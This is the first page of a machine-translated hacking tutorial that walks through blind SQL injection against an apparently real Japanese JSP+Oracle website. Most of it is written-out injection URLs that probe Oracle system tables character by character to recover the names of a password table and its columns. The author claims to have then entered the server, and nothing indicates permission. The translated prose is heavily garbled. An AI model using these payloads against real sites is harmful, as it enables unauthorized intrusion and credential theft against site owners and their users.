SQL Injection was the prosperous topic, from ASP+MSSQL to PHP+MYSQL, a group walked is also a group difficulty, simultaneously has also accomplished in this area of technology the master like cloud: Pskey, small brave, isno et al. become a generation of idol character. Actually so long as we use the SQL sentence nimbly, perhaps will bring accident's harvest for oneself, oneself can also the master addiction! This article is writes to the new military recruits looked that the masters do not chop me! Who is called me is also new military recruits!
Now large-scale website, the one who looks like the bank, the government website to use generally is JSP+Oracle, looking from the WEB procedure, the universal existence question is very serious, hoped that the general programmer administrative personnels pay attention to this aspect the safe hidden danger. Today our goal is also the JSP+Oracle website, carries on SQL Injection to it the test, hoped that achieves the extension, to develop this kind of technical the goal. Japan sign stand: http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797. As shown in Figure 1.
Figure 1
First we have a look at Oracle the system database:
all_tables deposits current ID and other user's all tables.
user_tables deposits current user all tables.
user_tab_columns deposits the current user table all rows.
These things are the foundations which behind operates, is very important. Below looked at the concrete operating process.
First needs to look whether the system table does exist, generally is the existence, has not had has played, only could go home to hug the child. Submits URL:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from all_tables) and '1 ' = ' 1
Here is wants to look that does have “all_tables” this system table, after “and” result and 0 comparisons, if behind for really, this entire sentence for really, and can return to the page normally, otherwise could not return normally. The following judgment is also this truth, believed that everybody understood, I not said. Submits in turn again:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables) and '1 ' = ' 1
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns) AND '1 ' = ' 1
Returns to the following result, as shown in Figure 2.
Figure 2
Correctly returns, explanation existence guess system table. Below looked how we do guess its other table (the attention: In Oracle table, the row name wants the capital letter, must pay attention loses writes, but also under has uses to function and so on Length(), Substr() explanations, please examine the correlation data).
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where substr(table_name,1,1)='P') and '1 ' = ' 1
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where substr(table_name,1,2)='PL') and '1 ' = ' 1
The second letter is L, everybody also possibly uses Ascii() to try. Obtains one table, the first character is P, the second character is L. Perspiration! Trying one by one, to afterward only then discovered that here step is really unnecessary ......
We have a look at this table again the length, determined that the scope is only then good guessed, otherwise did not know that must guess correctly when could finish:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where length(table_name)>8 and table_name like'%25PL%25') and '1 ' = ' 1
Without the correct returns. Will look like will not be bigger than 8, then we will try to be equal to 8:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where length(table_name)=8 and table_name like'%25PL%25') and '1 ' = ' 1
Yeah! The normal returns, we determined that the table famous length was 8. If everybody is guessing, may also use and so on narrow scope. Below we continue with above sentence to guess table, finally obtains table named PLAN_TAB.
TIPS: Here may use Like to guess the table, for instance: Has a look to have any ADMIN, USERS table anything.
and 0 (select count(*) from user_tables where table_name like '%25ADMIN%25') and '1 ' = ' 1
and 0 (select count(*) from user_tables where table_name like '%25USERS%25') and '1 ' = ' 1
Table guessed, we examined:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tables where table_name='PLAN_TAB') and '1 ' = ' 1
Normal returns. We laborious have not wasted finally, but the smoke has sacrificed but actually many, but revolutionizes not yet succeeds, comrade must diligently! Continues to guess a row name:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='PLAN_TAB' and column_name like '%25PASS%25') and '1 ' = ' 1
Tries (me who has PASS some very easily to think to try) this field, the result has been very disappointed, anything does not have. What means does that have to guess it? Looks at the following method.
Looked like this outside and inside not to have what sensitive row to be famous, a little was discouraged. Flips Oracle again the book, thinks suddenly may direct Zha Lieming, the perspiration! Possibly was before studied MSSQL, MYSQL time formed the fixed thought that has forgotten Oracle is dissimilar. Then we simply come directly
Has a look to have the sensitive row name!.
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25') and '1 ' = ' 1
Guessed directly has a look to have PASS, with NAME such row name. Has LIKE after the test the ID/NAME/PASSWD these three row name, but they have the possibility not in the identical outside and inside, then I take LIKE PASS this to test. Has a look to have a PASSWD this row correspondence table length first:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and length(table_name)=8) and '1 ' = ' 1
Obtains has the NAME this field correspondence table length is 8, continues to guess correctly corresponding table:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,1)='T') and '1 ' = ' 1
Can they in the identical outside and inside? Looked under knew. Obtains the PASS correspondence table first character is T:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where column_name like '%25PASS%25' and substr(table_name,1,8)='T_PASSWD') and '1 ' = ' 1
A character character guessed that the method with above guessed the table the process is the same, was only front many conditions “column_name like '%25PASS%25'”. Finally obtains this table named: T_PASSWD, then certainly guesses the Like ID/NMAE/PASSWD row name completely:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,-2,2)='ID') and '1 ' = ' 1
May determine that the ID two characters in most following two, everybody may change in Sbustr() the value, slowly narrow scope:
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,1)='S') and '1 ' = ' 1
Obtains the first character is S.
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,2)='ST') and '1 ' = ' 1
The second character is T.
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,3)='STA') and '1 ' = ' 1
Third is A ......Until the eighth character.
http://www.****jp.cn/viewBulletin.do?type=C&bulletin_id=200404010797'and 0 (select count(*) from user_tab_columns where table_name='T_PASSWD' and substr(column_name,1,8)=' STAFF_ID ') and '1 ' = ' 1
Might see from here is completely the identical table. Actually meets such many inferior procedures, has not seen the table which is constructs separately. Finally obtains the table name is: T_PASSWD, arranges in order the name to have four, respectively is STAFF_ID, STS, PASSWORD, LAST_DATE, afterward confirmed that these guessed the solution was correct (enters server anything to see, as shown in Figure 3).
Other pages: : 1 * 2 * Next>>
|
You are here: hacking technology
> hacker course
> Content
Category: